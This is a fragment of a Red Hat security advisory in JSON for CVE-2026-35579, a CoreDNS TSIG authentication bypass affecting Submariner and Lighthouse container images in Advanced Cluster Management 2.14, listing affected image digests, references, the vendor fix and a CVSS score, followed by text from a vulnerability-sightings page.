"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-35579"
},
{
"category": "external",
"summary": "RHBZ#2466905",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2466905"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-35579",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-35579"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-35579",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35579"
},
{
"category": "external",
"summary": "https://github.com/coredns/coredns/security/advisories/GHSA-vp29-5652-4fw9",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-vp29-5652-4fw9"
}
],
"release_date": "2026-05-05T20:29:16.903000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T20:51:55+00:00",
"details": "For release note details, see the upstream Submariner release notes:\n\nhttps://submariner.io/community/releases/\n\nDownstream-specific issues resolved:\n* ACM-27238\n* ACM-28294\n* ACM-28295\n* ACM-28311\n* ACM-28313\n* ACM-28314\n* ACM-28315\n* ACM-28316\n* ACM-28329\n* ACM-28331\n* ACM-28333\n* ACM-28335\n* ACM-28337\n* ACM-28339\n* ACM-28342\n* ACM-29317\n* ACM-29511\n* ACM-29613\n* ACM-29614\n* ACM-29631\n* ACM-29632\n* ACM-29633\n* ACM-29634\n* ACM-29776\n* ACM-30134\n* ACM-30726\n* ACM-30727\n* ACM-30728\n* ACM-30729\n* ACM-30970\n* ACM-31136\n* ACM-31831\n* ACM-31840\n* ACM-32575\n* ACM-32842\n* ACM-34108\n* ACM-34586\n* ACM-34589\n\nFor more details, see the Red Hat Advanced Cluster Management for Kubernetes documentation:\n\nhttps://docs.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.14/",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25127"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/coredns/coredns: CoreDNS: Authentication bypass allows unauthorized access to TSIG-protected functionalities"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…